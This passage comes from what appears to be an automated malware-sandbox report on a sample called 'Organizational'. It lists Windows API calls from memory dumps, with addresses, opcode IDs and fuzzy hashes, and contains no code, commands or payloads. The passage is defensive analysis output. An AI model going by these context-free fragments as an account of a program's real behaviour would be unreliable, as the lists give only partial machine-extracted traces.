                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: _memmove$__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 3253778849-0
                                                          • Opcode ID: c1d4d61aec3e97959054d52700e379228b0f43a147c246075d4bbaf544f73aac
                                                          • Instruction ID: b502a72c49d7a91ad13ae6a153c77358964d46d634691767baa5170b6a4501ee
                                                          • Opcode Fuzzy Hash: c1d4d61aec3e97959054d52700e379228b0f43a147c246075d4bbaf544f73aac
                                                          • Instruction Fuzzy Hash: B061BE3112029AABCF11EF64CC85EFE77A4AF05348F048559FC596B192DB38A865CF50
                                                          APIs
                                                            • Part of subcall function 00261A36: _memmove.LIBCMT ref: 00261A77
                                                            • Part of subcall function 002D147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002D040D,?,?), ref: 002D1491
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002D091D
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002D095D
                                                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 002D0980
                                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 002D09A9
                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 002D09EC
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 002D09F9
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                          • String ID:
                                                          • API String ID: 4046560759-0
                                                          • Opcode ID: 3650227adf0a36e766ec39e4ec9b487a88470ff68cf70c1202be019c3afb64fd
                                                          • Instruction ID: 1d9154f0e8b1486586325ab93ec316baaa46d99c04cb7e96fe7365754e38bc02
                                                          • Opcode Fuzzy Hash: 3650227adf0a36e766ec39e4ec9b487a88470ff68cf70c1202be019c3afb64fd
                                                          • Instruction Fuzzy Hash: BA518A31128241AFD700EF64C895E6ABBE8FF84714F04491EF989872A2DB71ED65CF52
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 002AF6A2
                                                          • VariantClear.OLEAUT32(00000013), ref: 002AF714
                                                          • VariantClear.OLEAUT32(00000000), ref: 002AF76F
                                                          • _memmove.LIBCMT ref: 002AF799
                                                          • VariantClear.OLEAUT32(?), ref: 002AF7E6
                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 002AF814
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Variant$Clear$ChangeInitType_memmove
                                                          • String ID:
                                                          • API String ID: 1101466143-0
                                                          • Opcode ID: 606f6d548db4981b00a4136b476fe74932c8944d0e28987c1f980721be570b3b
                                                          • Instruction ID: bf71cc9944d30b73bffcb6332bca7501e3f528503af556384f5ce59a4669a67b
                                                          • Opcode Fuzzy Hash: 606f6d548db4981b00a4136b476fe74932c8944d0e28987c1f980721be570b3b
                                                          • Instruction Fuzzy Hash: FE5179B5A10209EFCB14CF58D884AAAB7B8FF4D314F15816AE959DB340E734E951CFA0
                                                          APIs
                                                          • _memset.LIBCMT ref: 002B29FF
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002B2A4A
                                                          • IsMenu.USER32(00000000), ref: 002B2A6A
                                                          • CreatePopupMenu.USER32 ref: 002B2A9E
                                                          • GetMenuItemCount.USER32(000000FF), ref: 002B2AFC
                                                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 002B2B2D
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                          • String ID:
                                                          • API String ID: 3311875123-0
                                                          • Opcode ID: 704dc4ab8f872c4a18ce28ce1b30ef2138404176dfde435d5d11294965a825a3
                                                          • Instruction ID: 3fac58ade958870c1923276570d6c63a087c354c98c21f079b6263bf6b2fa801
                                                          • Opcode Fuzzy Hash: 704dc4ab8f872c4a18ce28ce1b30ef2138404176dfde435d5d11294965a825a3
                                                          • Instruction Fuzzy Hash: E451C07062034ADBDF25CF68D888BEEBBF4AF14398F144119E8519B291DBB09968CB51
                                                          APIs
                                                            • Part of subcall function 002529E2: GetWindowLongW.USER32(?,000000EB), ref: 002529F3
                                                          • BeginPaint.USER32(?,?,?,?,?,?), ref: 00251B76
                                                          • GetWindowRect.USER32(?,?), ref: 00251BDA
                                                          • ScreenToClient.USER32(?,?), ref: 00251BF7
                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00251C08
                                                          • EndPaint.USER32(?,?), ref: 00251C52
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                          • String ID:
                                                          • API String ID: 1827037458-0
                                                          • Opcode ID: 910c6e0548d7c50670dc7f85a668bd57dba3c19ca93886501194ae5a2941f1b0
                                                          • Instruction ID: 22635534a1a2fc1166d4952bc87a0658f99727188a9f90530ce7117e626db3be
                                                          • Opcode Fuzzy Hash: 910c6e0548d7c50670dc7f85a668bd57dba3c19ca93886501194ae5a2941f1b0
                                                          • Instruction Fuzzy Hash: DD411130114301AFD711DF24CCC9FBA7BF8EB49326F140669F9948B2A1C7719869DB62
                                                          APIs
                                                          • ShowWindow.USER32(003177B0,00000000,016F5700,?,?,003177B0,?,002DBC1A,?,?), ref: 002DBD84
                                                          • EnableWindow.USER32(?,00000000), ref: 002DBDA8
                                                          • ShowWindow.USER32(003177B0,00000000,016F5700,?,?,003177B0,?,002DBC1A,?,?), ref: 002DBE08
                                                          • ShowWindow.USER32(?,00000004,?,002DBC1A,?,?), ref: 002DBE1A
                                                          • EnableWindow.USER32(?,00000001), ref: 002DBE3E
                                                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 002DBE61
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Window$Show$Enable$MessageSend
                                                          • String ID:
                                                          • API String ID: 642888154-0
                                                          • Opcode ID: 7d231e9e5578a4b38de31eb02753dcda94775168325f6a58be2cea2e6ca232ea
                                                          • Instruction ID: 063dd12e11008ff03761e7b72ea95d9ab5481e3b1b773a083a099a87dd5eb674
                                                          • Opcode Fuzzy Hash: 7d231e9e5578a4b38de31eb02753dcda94775168325f6a58be2cea2e6ca232ea
                                                          • Instruction Fuzzy Hash: 3E416F34614145EFDB22CF14C499B947BF2FF09714F5941AAEA488F3A2C771AC66CB50
                                                          APIs
                                                          • GetForegroundWindow.USER32(?,?,?,?,?,?,002C550C,?,?,00000000,00000001), ref: 002C7796
                                                            • Part of subcall function 002C406C: GetWindowRect.USER32(?,?), ref: 002C407F
                                                          • GetDesktopWindow.USER32 ref: 002C77C0
                                                          • GetWindowRect.USER32(00000000), ref: 002C77C7
                                                          • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 002C77F9
                                                            • Part of subcall function 002B57FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 002B5877
                                                          • GetCursorPos.USER32(?), ref: 002C7825
                                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 002C7883
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                          • String ID:
                                                          • API String ID: 4137160315-0
                                                          • Opcode ID: 69092ae24bf053a7c73147aec447af4ec26e1ef9db231d278cf62b0afe075b6f
                                                          • Instruction ID: a4abc56935cb815b30b7c959637571b9ba96630ee5f80a06abaa5798bfcf528d
                                                          • Opcode Fuzzy Hash: 69092ae24bf053a7c73147aec447af4ec26e1ef9db231d278cf62b0afe075b6f
                                                          • Instruction Fuzzy Hash: 0931D272508356ABD720DF14D889F9BB7A9FF88314F000A1DF5859B181CA70E959CF92
                                                          APIs
                                                            • Part of subcall function 002A8CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 002A8CDE
                                                            • Part of subcall function 002A8CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 002A8CE8
                                                            • Part of subcall function 002A8CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 002A8CF7
                                                            • Part of subcall function 002A8CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 002A8CFE
                                                            • Part of subcall function 002A8CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 002A8D14
                                                          • GetLengthSid.ADVAPI32(?,00000000,002A904D), ref: 002A9482
                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 002A948E
                                                          • HeapAlloc.KERNEL32(00000000), ref: 002A9495
                                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 002A94AE
                                                          • GetProcessHeap.KERNEL32(00000000,00000000,002A904D), ref: 002A94C2
                                                          • HeapFree.KERNEL32(00000000), ref: 002A94C9
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                          • String ID:
                                                          • API String ID: 3008561057-0
                                                          • Opcode ID: b5d9685060eb78b695ac2146528877fe80bc14c13bf3fafb8423c936c21349c8
                                                          • Instruction ID: c37ba7f72de24bcb7feb8b941e3fcf965f37b38f5921ca2344e18a465ac12e2d
                                                          • Opcode Fuzzy Hash: b5d9685060eb78b695ac2146528877fe80bc14c13bf3fafb8423c936c21349c8
                                                          • Instruction Fuzzy Hash: 07110331560205FFDB108FA5DC89FAF7BB9FF4A315F148018E9459B210CB36A992CB60
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 002A9200
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 002A9207
                                                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 002A9216
                                                          • CloseHandle.KERNEL32(00000004), ref: 002A9221
                                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 002A9250
                                                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 002A9264
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                          • String ID:
                                                          • API String ID: 1413079979-0
                                                          • Opcode ID: e60ef9b8f6b494015708da31bfcef6adecbf7a3351d9473413f3bb4dcb199b64
                                                          • Instruction ID: 7372d37bf86601a4b1e7ecd1df2d34a7fd866089d03b5758999d6fc7084e2f32
                                                          • Opcode Fuzzy Hash: e60ef9b8f6b494015708da31bfcef6adecbf7a3351d9473413f3bb4dcb199b64
                                                          • Instruction Fuzzy Hash: D811597254124EABDF018F94ED8DFDE7BA9EF09304F044055FE04A6160C7B69DA1EB60
                                                          APIs
                                                          • GetDC.USER32(00000000), ref: 002AC34E
                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 002AC35F
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002AC366
                                                          • ReleaseDC.USER32(00000000,00000000), ref: 002AC36E
                                                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 002AC385
                                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 002AC397
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: CapsDevice$Release
                                                          • String ID:
                                                          • API String ID: 1035833867-0
                                                          • Opcode ID: c243c3f6b5096d2306b39dc1a36f3a6f81c2d390e75d1f26355ebf27fc627cd6
                                                          • Instruction ID: 7674035cfbff8b8fc8b5fc7db4816b4dbb06b8ff6d0ec2dd4ebef48235846477
                                                          • Opcode Fuzzy Hash: c243c3f6b5096d2306b39dc1a36f3a6f81c2d390e75d1f26355ebf27fc627cd6
                                                          • Instruction Fuzzy Hash: 74018871E40205BBDF105FA59C89B5EBFB8EB49311F004065FA08AB240D6709C11CF60
                                                          APIs
                                                            • Part of subcall function 002516CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00251729
                                                            • Part of subcall function 002516CF: SelectObject.GDI32(?,00000000), ref: 00251738
                                                            • Part of subcall function 002516CF: BeginPath.GDI32(?), ref: 0025174F
                                                            • Part of subcall function 002516CF: SelectObject.GDI32(?,00000000), ref: 00251778
                                                          • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 002DC57C
                                                          • LineTo.GDI32(00000000,00000003,?), ref: 002DC590
                                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 002DC59E
                                                          • LineTo.GDI32(00000000,00000000,?), ref: 002DC5AE
                                                          • EndPath.GDI32(00000000), ref: 002DC5BE
                                                          • StrokePath.GDI32(00000000), ref: 002DC5CE
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                          • String ID:
                                                          • API String ID: 43455801-0
                                                          • Opcode ID: 9fe396edb1a477b3c21dbf7d9dec98072b67cdc243eece7344129ab41281ffc2
                                                          • Instruction ID: 70b5560fb0b736303ac227135c144d6125dfd93d89c697d0b6ea5868e51582ea
                                                          • Opcode Fuzzy Hash: 9fe396edb1a477b3c21dbf7d9dec98072b67cdc243eece7344129ab41281ffc2
                                                          • Instruction Fuzzy Hash: D911097204014DBFDF129F90EC88FEA7FADEB08354F048015BA185A160C771AEA5DBA0
                                                          APIs
                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 002707EC
                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 002707F4
                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 002707FF
                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0027080A
                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 00270812
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0027081A
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Virtual
                                                          • String ID:
                                                          • API String ID: 4278518827-0
                                                          • Opcode ID: e368f146e7af2743fb7aa7d7a08d60f35fbdcb7b88ccc192011595c35c7faeea
                                                          • Instruction ID: 46d68b4f959894ed674abeaa8b549b485aa86f903195ff25d56760fcdd180095
                                                          • Opcode Fuzzy Hash: e368f146e7af2743fb7aa7d7a08d60f35fbdcb7b88ccc192011595c35c7faeea
                                                          • Instruction Fuzzy Hash: 3C016CB09417597DE3008F5A8C85B52FFA8FF59354F00411BA15C4B941C7F5A864CFE5
                                                          APIs
                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 002B59B4
                                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 002B59CA
                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 002B59D9
                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002B59E8
                                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002B59F2
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002B59F9
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                          • String ID:
                                                          • API String ID: 839392675-0
                                                          • Opcode ID: d1ac63cf81938765cbbe282c74f190b6f0cdd4cfd9eecd14982fc27d494ab9a5
                                                          • Instruction ID: b9d6dd5c57684ee1495087dd9b5e24ea425fb10814f92367b028c604d5fbe638
                                                          • Opcode Fuzzy Hash: d1ac63cf81938765cbbe282c74f190b6f0cdd4cfd9eecd14982fc27d494ab9a5
                                                          • Instruction Fuzzy Hash: 77F03032681598BBE7215B92BC8DFEF7B7CEFC6B11F000159FA0599050D7E01A5286B5
                                                          APIs
                                                          • InterlockedExchange.KERNEL32(?,?), ref: 002B77FE
                                                          • EnterCriticalSection.KERNEL32(?,?,0025C2B6,?,?), ref: 002B780F
                                                          • TerminateThread.KERNEL32(00000000,000001F6,?,0025C2B6,?,?), ref: 002B781C
                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8,?,0025C2B6,?,?), ref: 002B7829
                                                            • Part of subcall function 002B71F0: CloseHandle.KERNEL32(00000000,?,002B7836,?,0025C2B6,?,?), ref: 002B71FA
                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 002B783C
                                                          • LeaveCriticalSection.KERNEL32(?,?,0025C2B6,?,?), ref: 002B7843
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                          • String ID:
                                                          • API String ID: 3495660284-0
                                                          • Opcode ID: 341d26e7113aecbbe29b664bff276ee3af41a8d6356fd2f9bd5c6fbae6abcac3
                                                          • Instruction ID: 679c7d6aa259a6868df87642b57f2062eeae59f4cc3733b5f5e68bbf8c9783b2
                                                          • Opcode Fuzzy Hash: 341d26e7113aecbbe29b664bff276ee3af41a8d6356fd2f9bd5c6fbae6abcac3
                                                          • Instruction Fuzzy Hash: 54F05E32195252ABD7112BA4FCCCAEB7769FF45302B180421F6029D0A0CBF55852DB60
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 002A9555
                                                          • UnloadUserProfile.USERENV(?,?), ref: 002A9561
                                                          • CloseHandle.KERNEL32(?), ref: 002A956A
                                                          • CloseHandle.KERNEL32(?), ref: 002A9572
                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 002A957B
                                                          • HeapFree.KERNEL32(00000000), ref: 002A9582
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                          • String ID:
                                                          • API String ID: 146765662-0
                                                          • Opcode ID: 17a1d39cb67fc5e68c66a7252ac028855ea8ee61c6e35dc855ed5eac44e2dd04
                                                          • Instruction ID: 7d66ddc3311f8a90fc98c6a940b8e701e4b6f13f6268f9d0c00930905f1841ba
                                                          • Opcode Fuzzy Hash: 17a1d39cb67fc5e68c66a7252ac028855ea8ee61c6e35dc855ed5eac44e2dd04
                                                          • Instruction Fuzzy Hash: FCE0E536084181BBDB011FE1FC8C95ABF39FF49722B144220F2198D470CBB2A4A2DB50
                                                          APIs
